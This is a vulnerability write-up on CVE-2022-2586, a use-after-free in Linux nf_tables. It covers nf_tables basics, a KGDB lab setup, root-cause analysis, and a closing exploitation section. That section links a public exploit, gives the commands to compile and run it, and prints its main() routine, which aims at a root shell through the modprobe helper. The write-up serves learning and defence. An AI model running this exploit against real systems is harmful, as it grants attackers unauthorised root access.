Use-After-Free Vulnerability: Linked Chain between NFT Tables (CVE-2022-2586)

Apr 27, 2024

Summary

It was discovered that an nft object or expression could reference an nft set in a different nft table, leading to a use-after-free once that table was deleted.

What is NF_Tables?

NF_Tables is a packet-filtering framework in the Linux kernel that provides an efficient and flexible way to classify and manipulate network packets. It is designed to replace the older iptables and ip6tables tools for firewall and packet filtering tasks, offering improved performance, syntax, and capabilities.

NF_Tables allows you to define rulesets to control the flow of network packets through your system. It uses a rule-based syntax to match packets based on various criteria and then applies actions to those packets, such as dropping, accepting, or modifying them. The rules are organized into tables, chains, and rulesets, providing a hierarchical structure for packet filtering.

Here’s a simple example of using NF_Tables to create a rule that allows incoming SSH (TCP port 22) connections:

1. Installing nf_tables (if not already installed):

Make sure NF_Tables is installed on your system. You can typically install it using your distribution package manager.

2. Creating a nf_tables Rule:

Open a terminal and run the following commands as the root user (or using sudo):

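# Create the table and the input chain if they do not exist yet
nft add table ip filter
nft add chain ip filter input { type filter hook input priority 0 \; }

# Add a rule that allows incoming SSH connections
nft add rule ip filter input tcp dport 22 accept

# List the rules to verify
nft list ruleset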

Let’s break down the command:

- nft add rule: This is the command to add a rule to an nf_tables ruleset.

- ip: Selects the address family; ip means the rule applies to IPv4 traffic.

- filter: Refers to the filter table, which is commonly used for packet filtering.

- input: Refers to the input chain, which is used for incoming packets.

- tcp dport 22: This is the matching criteria. It matches TCP packets with destination port 22 (SSH).

- accept: This is the action to take if the packet matches the criteria. In this case, it allows the packet.

Testing the Rule: To test the rule, you can initiate an SSH connection to your system from another machine. If the rule is correctly configured, the connection should be allowed.

NF_Tables provides a wide range of features, including more complex rule structures, address translation, connection tracking, and more. The above example demonstrates how to create a basic rule to allow SSH connections, but NF_Tables can be used for much more advanced network packet filtering and manipulation tasks.

Expression and Registers

In nf_tables, expressions and registers are used to define actions and store data while processing network packets. Expressions are building blocks that allow you to perform various actions on packets, such as accepting, dropping, or modifying them. Registers are memory locations used to store packet data temporarily for further processing.

Imagine a security guard at the entrance of a building whose job is to decide who can enter and what they are allowed to do inside. To make these decisions, the guard needs to look at certain information about each visitor: their name, ID card, purpose of visit, and so on.

Networks need similar decisions to allow or control traffic, and this is where expressions come in. Just as the guard needs information to make a decision, expressions gather information from network traffic and act on it.

Expressions are like pieces of logic that help us understand what’s happening in the network traffic and allow us to take action accordingly. They are the building blocks of rules in a network firewall or filter.

Think of expressions as mini-programs that analyze network data to answer questions like “Who is sending this data?” or “What type of data is being sent?” This information is crucial for making decisions about whether to allow or block traffic.

When someone creates a new type of expression, it is registered in the kernel, which records the name of the expression, what it can do, and how it should be used.

In the Linux kernel, when a new type of expression is created by a module (such as net/netfilter/nft_immediate.c), there is a special structure called nft_expr_type associated with it. This structure contains important information about the expression type, including its name, a table of functions (called ops functions) that define its behavior, various flags, and more.

Explanation with an Analogy:

Think of expression types as different types of tools you can use to build something. Each tool has its own set of characteristics and functions. The nft_expr_type structure is like a user manual for each tool. It tells you the tool's name, what functions it can perform, and any special features it has.

Example Analogy: Building Blocks with Different Tools

Imagine you have a box of building blocks, each representing a different type of expression. You want to build various structures using these blocks. Each block type has a user manual that explains how to use it.

Block Types: Imagine you have blocks of different shapes, like squares, triangles, and circles.
User Manuals: Each block type comes with a user manual that tells you its name, how to stack them, how to connect them, and any special features they have.
Building: You follow the instructions in the user manual to stack and connect the blocks in specific ways to create different structures.

                  +-----------------------+
                  |nft_expr_type Structure|
                  +-----------------------+
                  | Name: Immediate       |
                  | Ops Table:            |
                  | - Op1: Perform Action |
                  | - Op2: Handle Event   |
                  | Flags: Important      |
                  +-----------------------+

                         |
                         v

+------------------+   +------------------+   +------------------+
|    Expression    |   |    Expression    |   |    Expression    |
|   Type: Square   |   |  Type: Triangle  |   |   Type: Circle   |
|   Ops Table:     |   |  Ops Table:      |   |   Ops Table:     |
|   - Op1: Stack   |   |  - Op1: Connect  |   |   - Op1: Roll    |
|   - Op2: Paint   |   |  - Op2: Color    |   |   - Op2: Bounce  |
|                  |   |                  |   |                  |
+------------------+   +------------------+   +------------------+

In this analogy:

- The nft_expr_type structure is like the user manual for each block type.
- Each block type corresponds to an expression type defined in the kernel.
- The ops table in the structure is like the set of instructions in the user manual.
- The building process corresponds to using the expression types to achieve specific actions or behaviors.

Just like you use different building blocks to create different structures, in the kernel, different expression types are used to achieve various functionalities within the networking and filtering systems. The nft_expr_type structure provides the necessary information for the kernel to understand and utilize these expression types effectively.
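To make the analogy a little more concrete, here is a minimal user-space sketch of a type descriptor that carries a name, flags, and a table of function pointers. All names in it (expr_type, expr_ops, counter_eval, expr_type_find) are illustrative assumptions; the real nft_expr_type in the kernel has more fields and a different layout.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical, simplified ops table: the behavior of one expression. */
struct expr_ops {
    void (*eval)(void *priv, size_t pkt_len);   /* run once per packet */
};

/* Hypothetical, simplified stand-in for nft_expr_type (the "user manual"). */
struct expr_type {
    const char *name;              /* identifier used to find the type */
    const struct expr_ops *ops;    /* table of behavior callbacks */
    unsigned int flags;            /* type-level flags */
};

/* Private state of an illustrative counting expression. */
struct counter_priv {
    unsigned long packets;
    unsigned long bytes;
};

/* The single operation of the illustrative expression: count a packet. */
static void counter_eval(void *priv, size_t pkt_len)
{
    struct counter_priv *c = priv;

    c->packets += 1;
    c->bytes += pkt_len;
}

static const struct expr_ops counter_ops = { .eval = counter_eval };

/* The set of "registered" types in this sketch. */
static const struct expr_type registered_types[] = {
    { .name = "counter", .ops = &counter_ops, .flags = 0 },
};

/* Find a registered type by name; returns NULL when it is unknown. */
static const struct expr_type *expr_type_find(const char *name)
{
    size_t n = sizeof(registered_types) / sizeof(registered_types[0]);

    for (size_t i = 0; i < n; i++)
        if (strcmp(registered_types[i].name, name) == 0)
            return &registered_types[i];
    return NULL;
}
```

A caller would look the type up by name and then invoke the behavior through the ops table, for example t->ops->eval(&state, packet_length), without knowing which concrete expression is behind it.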

A More Practical Example:

An example of an expression is the “counter” expression, which is used to count the number of packets that match a specific rule. Let’s see how to use the “counter” expression to count incoming packets on a specific port.

Suppose you want to count the number of incoming packets on port 80 (HTTP) using nf_tables. First, you would create a new table to store the rule:

nft add table ip leak_chain

Then, you would add a new chain to the table:

nft add chain ip leak_chain input { type filter hook input priority 0 \; }

Next, you can define the rule with the “counter” expression:

nft add rule ip leak_chain input tcp dport 80 counter

Now, every time a packet with TCP destination port 80 arrives, nf_tables will increment the counter for that rule. To view the counters, you can use the following command:

nft list ruleset

You will see the counters associated with the rule:

table ip leak_chain {
    chain input {
        type filter hook input priority 0; policy accept;
        tcp dport 80 counter packets 1024 bytes 122880
    }
}

In this example, 1024 packets with a total of 122880 bytes have been counted so far.

Registers in nf_tables are used to store specific packet data that can be referenced in subsequent rules or actions. For example, you can use a register to store the source IP address of a packet and then use that information in a different rule.

Overall, expressions and registers in nf_tables provide powerful mechanisms for customizing packet processing and implementing advanced filtering and networking logic.
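The interplay between expressions and registers can be sketched in user space as follows. This is only a model under stated assumptions: the packet struct, the register count, and the function names are made up for illustration, and the two steps merely imitate what a payload-loading expression and a comparison expression do for a rule such as tcp dport 80.

```c
#include <stdint.h>

#define NREGS 4   /* illustrative register count, not the kernel's */

/* Hypothetical packet that carries only the field this sketch needs. */
struct packet {
    uint16_t tcp_dport;
};

/* Scratch registers shared by the expressions of one rule. */
struct regs {
    uint32_t data[NREGS];
};

/* First step: copy a packet field into a destination register. */
static void load_dport(const struct packet *pkt, struct regs *r, int dreg)
{
    r->data[dreg] = pkt->tcp_dport;
}

/* Second step: compare a source register against a constant. */
static int reg_equals(const struct regs *r, int sreg, uint32_t value)
{
    return r->data[sreg] == value;
}

/* Evaluate the rule "tcp dport 80": returns 1 on match, 0 otherwise. */
static int rule_matches_port80(const struct packet *pkt)
{
    struct regs r = { { 0 } };

    load_dport(pkt, &r, 1);        /* expression 1 writes register 1 */
    return reg_equals(&r, 1, 80);  /* expression 2 reads register 1 */
}
```

The point of the design is that the two expressions never talk to each other directly; the register is the only thing they share.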

The flags field of nft_expr_type can carry two values: stateful (NFT_EXPR_STATEFUL) and garbage collectible (NFT_EXPR_GC). These flags describe how expressions of that type behave.

                           +------------------+
                           | nft_expr_type    |
                           +------------------+
                           | select_ops       | --> Select appropriate ops
                           | release_ops      | --> Release ops resources
                           | ops              | --> Default ops
                           | list             | --> Internal list
                           | name             | --> Identifier
                           | owner            | --> Module reference
                           | policy           | --> Attribute policy
                           | maxattr          | --> Highest attribute number
                           | family           | --> Address family
                           | flags            | --> Expression type flags
                           +------------------+
                                     |
            +------------------------|------------------------+
            |                        |                        |
            |                  +------------+          +------------+
            |                  | NFT_EXPR_  |          | NFT_EXPR_  |
            |                  | STATEFUL   |          | GC         |
            |                  +------------+          +------------+
            |                        ^                        ^
            |                        |                        |
            +------------------------|------------------------+
                                     |
                              Specific Expression Flags
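
Flags of this kind are usually stored as bits in one integer and tested with a bitwise AND. The sketch below shows that pattern; the numeric values and the reduced expr_type_info struct are assumptions made for illustration, so check the kernel headers for the authoritative definitions.

```c
/* Flag bits; the numeric values are assumed for this sketch. */
#define NFT_EXPR_STATEFUL 0x1
#define NFT_EXPR_GC       0x2

/* Hypothetical, reduced type descriptor: only a name and the flags. */
struct expr_type_info {
    const char *name;
    unsigned int flags;
};

/* Nonzero when the type is marked as stateful. */
static int expr_is_stateful(const struct expr_type_info *t)
{
    return (t->flags & NFT_EXPR_STATEFUL) != 0;
}

/* Nonzero when the type is marked as garbage collectible. */
static int expr_supports_gc(const struct expr_type_info *t)
{
    return (t->flags & NFT_EXPR_GC) != 0;
}
```

Because each flag occupies its own bit, a type can carry both at once by OR-ing them together.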

This is a very simplified picture, but it should be enough to get started.

To learn more about nf_tables and expressions, see:

https://wiki.nftables.org/wiki-nftables/index.php/What_is_nftables%3F

https://www.vicarius.io/vsociety/posts/3001

Build the Lab

Because this vulnerability sits in a kernel module, debugging it takes a little more patience than usual 🦐

VirtualBox
I used 2 Linux Virtual Machines.

We have to debug a kernel module, and the kernel is not a user-space process, so GDB alone cannot attach to it; we need a client/server architecture. The kernel can be debugged remotely by combining a GDB server on the target machine with gdb on the host (development) machine. The Linux kernel has its own GDB server implementation called KGDB, which communicates with a GDB client over a network or serial port connection.

Host/Development Machine: Runs gdb against the vmlinux file which contains the symbols and performs debugging
Target Machine: Runs kgdb and is the machine to be debugged

    ------------------                              --------------------
    |       Host      |                             |       Target     |
    |                 |                             |                  |
    |  -------------  |                             |   ------------   |
    | |     gdb     | |<--------------------------->|  |    kgdb    |  |
    | |             | |             Serial or       |  |            |  |
    | --------------  |             Ethernet        |  -------------   |
    |       |         |             Connection      |        |         |
    |  -------------- |                             |  --------------  |
    | | Kernel image ||                             |  |Linux Kernel | |
    | | with debug   ||                             |  |(zImage)     | |
    | | symbols      ||                             |  |             | |
    | | (vmlinux)    ||                             |  --------------- |
    | ----------------|                             |                  |
    -------------------                             --------------------

Hence, two machines are required to use kgdb.

KGDB is a GDB server implementation integrated into the Linux kernel. It supports serial port communication (available in the mainline kernel) and network communication (patch required).

It has been available in the mainline Linux kernel since version 2.6.26 (x86 and sparc) and 2.6.27 (arm, MIPS, and PPC).

It enables full control over kernel execution on the target, including memory reads and writes, step-by-step execution, and even breakpoints in interrupt handlers.

There may be other ways to do this, but this is the setup I generally use.

I am using the Ubuntu 22.04 LTS AMD64 ISO: https://releases.ubuntu.com/

Connect and Create a Serial Port in VirtualBox

Assumptions for this step:

You have downloaded the ISO image locally and already created two VMs from it.

For the demonstration I created two machines, named target-server and dev machine.

Creating a serial port in VirtualBox and connecting the machines is easy:

1. Select your target machine in VirtualBox and open its settings.
2. In the settings of the target server, select Serial Ports and enter the configuration below.
3. Do not check Connect to existing pipe/socket, as no pipe or socket exists yet.

4. Once the serial port is configured, repeat steps 1 and 2 for the dev machine, but this time check Connect to existing pipe/socket and make sure you specify the same Path/Address.

Once that is done, congratulations: the lab is ready.

WARNING

! Do not start the dev machine first, otherwise you will see a serial port error. The two machines are connected through the serial port, and the dev machine expects the pipe created by the target machine to exist already.

DEBUGGING KERNEL — nf_tables

As discussed, the vulnerability lies in nf_tables, which is a kernel module. Debugging a kernel module takes some preparation, so let’s go through the initial setup first:

1. Verify that the dev and target machines can communicate over the serial port by sending a message across it.

I sent a message from the target machine to the dev machine and confirmed that they communicate over the serial port. Ubuntu 22.04 downloaded from the official website does not ship an older, affected kernel, so we have to downgrade the kernel; we will do that as part of the debugging setup.

2. Download an affected version of the kernel. I downloaded v5.12 from the official kernel GitHub repository.

Once you have checked out the affected kernel version, you need to build and install it and add it to GRUB. Before that, a few packages need to be available:

1. build-essential
2. flex
3. bison
4. libnftnl-dev
5. libmnl-dev
6. nftables - (Installed by default but just in case missing)
7. libncurses-dev
8. dkms
9. libssl-dev
10. libelf-dev

Once the packages are installed, enable KGDB in the kernel configuration. Move into the git repository where the kernel source was downloaded and run the make nconfig command.

This command opens the configuration in a text-based menu, where you can verify that the KGDB options are enabled.

3. Select Generic Kernel Debugging Instruments

4. Verify that the KGDB and magic SysRq options are selected

5. Once these settings are verified, check one more option: DEBUG_INFO should be y as well. To find it, press F8 and search for the name

With the packages installed and the debugging options verified, one check remains: because the flaw is in nf_tables, we need to make sure that this module is enabled and built as well.

To do that, go to Networking Support > Networking Options > Network Packet Filtering Framework > Core Netfilter Configuration

To be on the safe side, I enabled all netfilter modules related to nf_tables. Building and installing modules or the kernel image takes a long time, and this way we do not have to repeat the step because something needed for debugging was left out.

Press F6 to save the changes, then run make -j8 to build the Linux kernel with eight parallel jobs.

Go out and grab a coffee, as this is going to take a long time. Believe me, very long.

Verify that the vmlinux file is present in the source directory.

After make -j8 succeeds, run the make modules_install command and wait for it to complete.

Once that is completed, run make install, which installs the v5.12 kernel into /boot. Then run update-grub followed by reboot to restart the machine. During the restart, the boot menu offers a choice of kernel versions; select v5.12 and boot it.

Verify the kernel version by running uname -r

We have now downgraded to the affected kernel version.

Next, we want to enable the GDB scripts, a collection of helper scripts that simplify kernel debugging.

This takes two steps. On the target machine, CONFIG_GDB_SCRIPTS has to be enabled in the kernel configuration, which was already the case for our target machine.

On the dev machine, create a ~/.gdbinit file containing add-auto-load-safe-path <location-bin-file>

To debug the target machine, we also have to copy the compiled kernel source tree, built with debug information, to the dev server. To make copying easy, I installed OpenSSH on the target server and used the scp command on the dev server to copy the compiled linux folder from the target machine.

On the target machine we created a tar.gz file, and on the dev server we used scp to copy linux.tar.gz from the target.

Create the tar.gz file with tar: tar -czvf linux.tar.gz linux

On the dev server I copied the folder to /home/target/Desktop/linux

scp <username>@<ip-address>:<file-to-copy> <dev-server-location-to-paste>

Then I extracted the archive on the dev server with the tar command: tar -xzvf linux.tar.gz

Open the copied vmlinux with gdb; make sure to run it as the root user on the dev machine.

Next, to debug the kernel, we have to tell kgdboc which serial port and baud rate to use, so that the kernel can be debugged from the dev machine.

Run the SysRq magic sequence on the target server:

echo g > /proc/sysrq-trigger

On the dev server, run target remote /dev/ttyS0 inside gdb.

We can see that the kgdb breakpoint was triggered. Now let’s put breakpoints on our suspected functions.

Since the GDB scripts are enabled, let’s load our beloved affected nf_tables.ko module. Running apropos lx lists the helper commands; run lx-symbols to load the symbols for nf_tables.ko and the other loaded kernel modules into GDB.

Once the module symbols are loaded, we can put a breakpoint on the suspected function, in our case nft_set_elem_init in nf_tables_api.c, and start our static analysis.

STATIC ANALYSIS

In nf_tables, an expression could reference an nft set in a different nft table. To see how, I started the analysis in nf_tables_api.c, where lookups by ID are implemented by the function nft_set_lookup_byid for sets and by its counterpart nft_chain_lookup_byid for chains. The chain variant is broken down here:

Breakdown of the Code:

1. Function Signature:

The function nft_chain_lookup_byid takes two parameters: a pointer to the network namespace (const struct net *net) and a pointer to a Netlink attribute (const struct nlattr *nla).

2. Extracting Chain ID:

The function extracts the ID of the nft chain from the Netlink attribute (nla) using ntohl(nla_get_be32(nla)). This assumes that the ID is a 32-bit integer stored in big-endian format.

3. Transaction List Iteration:

It iterates through the list of transactions (struct nft_trans) in the commit list of the specified network namespace (net->nft.commit_list).

4. Transaction Check:

For each transaction, it checks if the transaction corresponds to a new chain (trans->msg_type == NFT_MSG_NEWCHAIN) and if the ID of that chain matches the specified ID (id == nft_trans_chain_id(trans)).

5. Returning the Chain:

If a match is found, it returns a pointer to the corresponding nft chain (return chain).

6. Error Handling:

If no match is found, it returns an error code (ERR_PTR(-ENOENT)) to indicate that the chain with the specified ID does not exist.
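
Step 2 above can be illustrated in user space: a 32-bit value that arrives in big-endian (network) byte order is converted to host order with ntohl. The helper name attr_get_id and the raw 4-byte payload are assumptions for this sketch; the kernel reads the value from a Netlink attribute through nla_get_be32 instead.

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <string.h>

/*
 * Interpret 4 payload bytes as a big-endian 32-bit ID and return it
 * in host byte order (hypothetical helper, user-space only).
 */
static uint32_t attr_get_id(const unsigned char payload[4])
{
    uint32_t be;

    memcpy(&be, payload, sizeof(be));   /* avoid unaligned access */
    return ntohl(be);                   /* network order -> host order */
}
```

For the bytes 00 00 12 34 the function yields 0x1234 regardless of the endianness of the machine it runs on.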

nft_chain_lookup_byid is referenced in two places: nf_tables_newrule and nft_verdict_init.

Let’s look at the nft_chain_lookup_byid function:

static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
					       const struct nlattr *nla)
{
	u32 id = ntohl(nla_get_be32(nla));
	struct nft_trans *trans;

	list_for_each_entry(trans, &net->nft.commit_list, list) {
		struct nft_chain *chain = trans->ctx.chain;

		if (trans->msg_type == NFT_MSG_NEWCHAIN &&
		    id == nft_trans_chain_id(trans))
			return chain;
	}
	return ERR_PTR(-ENOENT);
}
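
The same logic can be tried out in user space with a reduced model. The sketch below is an assumption-laden stand-in, not kernel code: the commit list is a plain singly linked list, the struct and enum names are invented, and a missing entry is reported with NULL where the kernel returns ERR_PTR(-ENOENT).

```c
#include <stddef.h>
#include <stdint.h>

/* Illustrative message types of pending transactions. */
enum msg_type { MSG_NEWTABLE, MSG_NEWCHAIN, MSG_NEWRULE };

struct chain {
    const char *name;
};

/* Simplified pending transaction in the commit list. */
struct trans {
    enum msg_type msg_type;
    uint32_t chain_id;       /* meaningful for MSG_NEWCHAIN only */
    struct chain *chain;
    struct trans *next;
};

/*
 * Walk the pending transactions and return the chain of the first
 * "new chain" transaction whose ID matches, or NULL if there is none.
 */
static struct chain *chain_lookup_byid(const struct trans *commit_list,
                                       uint32_t id)
{
    for (const struct trans *t = commit_list; t != NULL; t = t->next)
        if (t->msg_type == MSG_NEWCHAIN && t->chain_id == id)
            return t->chain;
    return NULL;
}
```

Note that both conditions must hold: a transaction of another type with the same ID value is skipped.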

Code breakdown for nf_tables_newrule:

Table Lookup:

The function starts by looking up the target nft_table based on the attributes provided in the Netlink message. If the table lookup fails, it returns an error.
Chain Lookup:
If the Netlink attribute NFTA_RULE_CHAIN is present, it looks up the corresponding nft_chain within the specified table. If NFTA_RULE_CHAIN_ID is present, it looks up the chain by ID. If neither is present, it returns an error.
Handle Lookup:
If NFTA_RULE_HANDLE is present, it looks up the rule by the provided handle within the specified chain. If NLM_F_EXCL is set, it checks for exclusivity. If NLM_F_REPLACE is set, it marks the existing rule for replacement.
Handle Allocation:
If NFTA_RULE_HANDLE is not present, it allocates a new handle for the rule using nf_tables_alloc_handle.
Positioning Logic:
If positioning information is present (NFTA_RULE_POSITION or NFTA_RULE_POSITION_ID), it looks up the rule at the specified position for potential insertion.
Further Logic:
The code includes additional logic related to rule creation, replacement, and position within the chain.
Cleanup and Return:
The code concludes with cleanup and return statements based on the outcomes of the operations.

Code breakdown for nft_verdict_init:

1. Attribute Parsing:

The function starts by parsing the nested attributes within the Netlink attribute (nla) using nla_parse_nested_deprecated.

2. Verdict Code Extraction:

It extracts the verdict code from the parsed attributes.

3. Switch Statement:

The function uses a switch statement to handle different cases based on the extracted verdict code.

4. Jump and Goto Handling:

For verdict codes NFT_JUMP and NFT_GOTO, the function checks whether the NFTA_VERDICT_CHAIN or the NFTA_VERDICT_CHAIN_ID attribute is present.

5. Chain Lookup:

If the chain name (NFTA_VERDICT_CHAIN) is present, it looks up the chain using nft_chain_lookup. If the chain ID (NFTA_VERDICT_CHAIN_ID) is present, it looks up the chain by ID using nft_chain_lookup_byid.

6. Handling Chain Lookup Results:

The function checks the result of the chain lookup, rejects base chains as jump targets, increments the chain’s usage count, and stores the chain in the nft_data structure.

7. Data Descriptor Setting:

Finally, the function sets the data descriptor with the length and type information.

Scenarios when nft_chain_lookup_byid is called:

When the verdict code is NFT_JUMP or NFT_GOTO.
When the NFTA_VERDICT_CHAIN_ID attribute is present in the Netlink message, indicating that the rule jumps or goes to another chain identified by its ID.

Consider a scenario where a user is configuring a network filtering rule that involves jumping to another chain based on the chain’s ID. The nft_chain_lookup_byid function is called to find the target chain by its ID within the network namespace.

Netlink Message:
- Attribute NFTA_VERDICT_CODE: NFT_JUMP
- Attribute NFTA_VERDICT_CHAIN_ID: <ID of the target chain>

Function Flow:
1. The function extracts the verdict code (NFT_JUMP) and the chain ID.
2. It calls nft_chain_lookup_byid to find the target chain by its ID.
3. If the lookup is successful, it increments the chain's usage count and sets it in the nft_data structure.
4. The function returns successfully, indicating that the verdict and associated chain have been initialized.
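
The decision of which lookup is used can be sketched as a small user-space function. Everything here is a simplified assumption: the enum values, the verdict_attrs struct, and the function name are invented for illustration, and the sketch only reports which path would be taken instead of performing the lookup.

```c
#include <stddef.h>
#include <stdint.h>

/* Illustrative verdict codes; the numeric values are not the kernel's. */
enum verdict_code { V_ACCEPT, V_DROP, V_JUMP, V_GOTO };

/* Which lookup the verdict initialization would use. */
enum lookup_path { PATH_NONE, PATH_BY_NAME, PATH_BY_ID, PATH_INVALID };

/* Hypothetical, already-parsed verdict attributes. */
struct verdict_attrs {
    enum verdict_code code;
    const char *chain_name;   /* NULL when no chain name was sent */
    int has_chain_id;         /* nonzero when a chain ID was sent */
    uint32_t chain_id;
};

/* Mirror the switch described above: only jump/goto need a chain. */
static enum lookup_path verdict_lookup_path(const struct verdict_attrs *a)
{
    switch (a->code) {
    case V_JUMP:
    case V_GOTO:
        if (a->chain_name != NULL)
            return PATH_BY_NAME;   /* lookup by chain name */
        if (a->has_chain_id)
            return PATH_BY_ID;     /* lookup by chain ID */
        return PATH_INVALID;       /* jump/goto without a target */
    default:
        return PATH_NONE;          /* no chain involved */
    }
}
```

The by-ID path is the one that matters for this vulnerability, since it resolves the target from pending transactions.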

Root Cause

Going back to the root cause analysis of the code :

static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
					       const struct nlattr *nla)
{
    u32 id = ntohl(nla_get_be32(nla));
    struct nft_trans *trans;
    list_for_each_entry(trans, &net->nft.commit_list, list) {
        struct nft_chain *chain = trans->ctx.chain;
        if (trans->msg_type == NFT_MSG_NEWCHAIN &&
            id == nft_trans_chain_id(trans))
            return chain;
    }
    return ERR_PTR(-ENOENT);
}

The lookup walks the commit list of the whole network namespace and returns the first pending chain whose ID matches. It never checks that the chain belongs to the same table as the rule that references it. A rule in one table can therefore take a reference to a chain that lives in a different table. If that other table is deleted, its chain is freed, but the rule still holds the pointer, and dereferencing it afterwards is a use-after-free. The same pattern applies to sets looked up by ID, which is the case described in the summary.

Consider the following sequence of events:

1. A new chain with a specific ID is created in one table as part of a transaction.
2. The transaction is added to the commit list.
3. A rule in a different table references the chain by its ID, and nft_chain_lookup_byid returns a pointer to it.
4. The table that owns the chain is deleted, which frees the chain.
5. The rule still holds the pointer to the now-freed chain, leading to a use-after-free when the pointer is subsequently dereferenced.

+---------------------+      +---------------------+      +---------------------+
|  Transaction List   |      |      nft_chain      |      |      nft_chain      |
|    +--------------+ |      |    +------------+   |      |    +------------+   |
|    | Transaction  | | ---> |    | Chain ID   |   |      |    |   Freed    |   |
|    |   (New)      | |      |    |            |   |      |    | or Deleted |   |
|    +--------------+ |      |    +------------+   |      |    +------------+   |
|    +--------------+ |      |    +------------+   |      |    +------------+   |
|    | Transaction  | | ---> |    | Chain ID   |   |      |    |   Freed    |   |
|    |   (Delete)   | |      |    |            |   |      |    | or Deleted |   |
|    +--------------+ |      |    +------------+   |      |    +------------+   |
|    +--------------+ |      |    +------------+   |      |    +------------+   |
|    | Transaction  | | ---> |    | Chain ID   |   |      |    |   Freed    |   |
|    |   (Modify)   | |      |    |            |   |      |    | or Deleted |   |
|    +--------------+ |      +---------------------+      +---------------------+
|          ...        |
+---------------------+

So the transaction list contains various transactions, including new chains and deletions. If the table that owns a chain is deleted while a rule in another table still holds the pointer obtained through nft_chain_lookup_byid, any later access to that chain is a use-after-free.
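
The cross-table reference from the summary can be modelled safely in user space. In the sketch below nothing is really freed: an alive field stands in for "this memory has been released", so the dangling reference can be observed without undefined behavior. All struct and function names are assumptions, and lookup_same_table only shows the general shape of an ownership check, not the actual kernel patch.

```c
#include <stddef.h>
#include <stdint.h>

struct table {
    const char *name;
};

struct chain {
    const struct table *table;  /* owning table */
    int alive;                  /* 0 models "memory already freed" */
};

struct trans {
    uint32_t chain_id;
    struct chain *chain;
    struct trans *next;
};

/* Lookup without an ownership check: a chain of any table can match. */
static struct chain *lookup_any_table(struct trans *list, uint32_t id)
{
    for (struct trans *t = list; t != NULL; t = t->next)
        if (t->chain_id == id)
            return t->chain;
    return NULL;
}

/* Stricter lookup: the chain must also belong to the caller's table. */
static struct chain *lookup_same_table(struct trans *list,
                                       const struct table *table,
                                       uint32_t id)
{
    for (struct trans *t = list; t != NULL; t = t->next)
        if (t->chain_id == id && t->chain->table == table)
            return t->chain;
    return NULL;
}

/* Model table deletion: every chain owned by the table is released. */
static void delete_table_model(struct trans *list, const struct table *table)
{
    for (struct trans *t = list; t != NULL; t = t->next)
        if (t->chain->table == table)
            t->chain->alive = 0;
}
```

With a chain owned by table B, a caller acting for table A gets a pointer from lookup_any_table; after delete_table_model runs for B, that pointer refers to a chain whose alive field is 0, which is the dangling reference. lookup_same_table refuses the request from table A in the first place.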

Exploitation and Explanation:

A public exploit / PoC is available for this vulnerability:

@lockedbyte : https://github.com/sniper404ghostxploit/CVE-2022-2586

I used this exploit.

Requirements to run the exploit:

You need the libmnl-dev and libnftnl-dev packages installed on your machine.

Affected Version

Linux, introduced with the commit 958bee14d071 (https://github.com/torvalds/linux/commit/958bee14d071).

Ubuntu <= 22.04 before security patch

Test Environment

Platform

Ubuntu 22.04 amd64

Versions

Linux ubuntu 5.12.0 #2 SMP Aug 18 14:17:41 JST 2023 x86_64 x86_64 x86_64 GNU/Linux

Once the exploit is downloaded, we need to compile and run it.

Running Exploit

# Once the exploit is downloaded, go to the downloaded folder and run the command below

gcc exploit.c -o exploit -lmnl -lnftnl -no-pie -lpthread

Result

Use git to download the exploit from: https://github.com/sniper404ghostxploit/CVE-2022-2586
Compile it with gcc exploit.c -o exploit -lmnl -lnftnl -no-pie -lpthread to create the exploit executable, then run ./exploit

Exploitation — Strategy Explanation and Development

The exploit is divided into several phases, and the author explains each phase in comments inside the code, which helps in understanding how and why the exploit was built. Take the following piece of the exploit as an example:

int main(int argc, char *argv[]) {
	struct mnl_socket *s = NULL;
	struct mnl_nlmsg_batch *batch = NULL;
	struct nlmsghdr *nh = NULL;
	int r = 0, seq = 0;
	uint16_t klen[64] = { 1 };
	char buf[16384] = { 0 };
	char *klk_obj_name = NULL;
	char *hlk_obj_name = NULL;
	char *sp_d = NULL;
	uint64_t *sp_d_l = NULL;
	char *sp2_d = NULL;
	uint64_t *sp2_d_l = NULL;
	char *rop_d = NULL;
	uint64_t *rop_d_l = NULL;
	size_t klk_tries = 0;
	pthread_t tx;
	void *retval = NULL;
	int pid = 0;
	int fd = 0;
	int pipefd[2] = { 0 };
	int sfd = 0, cfd = 0;
	int is_success = 0;
	char *pipefd_str = NULL;
	
	if(geteuid() == 0)
		goto EXP_P;
		
	pipe(pipefd);
	
	/* 
	   Drop callback scripts to achieve LPE from modprobe usermode
	   helper execution
	*/
	drop_callback_scripts();
	
	/*
	   Launch the process that will pop the root shell: it needs
	   to be outside of the namespace
	*/
	pid = fork();
	if(pid == 0) {
		close(pipefd[1]);

		r = read(pipefd[0], &is_success, sizeof(int));
		if(r < 0)
			bye("[-] Exploit failed!");
		
		sleep(2);
		
		if(is_success)
			launch_trigger();
		exit(0);
	}
	
	close(pipefd[0]);
	
	asprintf(&pipefd_str, "%d", pipefd[1]);
	
	//unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

	/*
	   Execute ourselves in a new network namespace to
	   be able to trigger and exploit the bug
	*/
	char *args[] = {
		UNSHARE_PATH, "-Urnm", argv[0], pipefd_str,
		NULL,
	};
	execvp(UNSHARE_PATH, args);
}

Let’s break down the comments and explain the developer’s intentions:

1. Drop callback scripts to achieve LPE from modprobe usermode helper execution:

“LPE” stands for Local Privilege Escalation. The goal is to escalate the privileges of the current process to root (superuser).
“modprobe” is a Linux utility that adds or removes kernel modules. “Usermode helper execution” refers to the kernel launching a user-space program, such as modprobe, on its own behalf; the helper runs with root privileges.
The “callback scripts” are scripts that the exploit writes to disk in advance. The likely intention is that, once the kernel has been manipulated into running an attacker-controlled script as its helper instead of the real modprobe, that script runs as root and completes the privilege escalation.

2. Launch the process that will pop the root shell: it needs to be outside of the namespace:

The developer uses fork() to create a child process that waits on a pipe and, once the exploit reports success, calls launch_trigger() to pop a root shell (provide a root command prompt).
The comment emphasizes that this process needs to be outside of the namespace. Namespaces in Linux provide isolated environments for processes, and “root” inside a user namespace is not root on the host. The child is forked before the exploit re-executes itself under unshare, so it stays in the original namespaces, where the shell it pops has real root privileges.

3. Execute ourselves in a new network namespace to be able to trigger and exploit the bug:

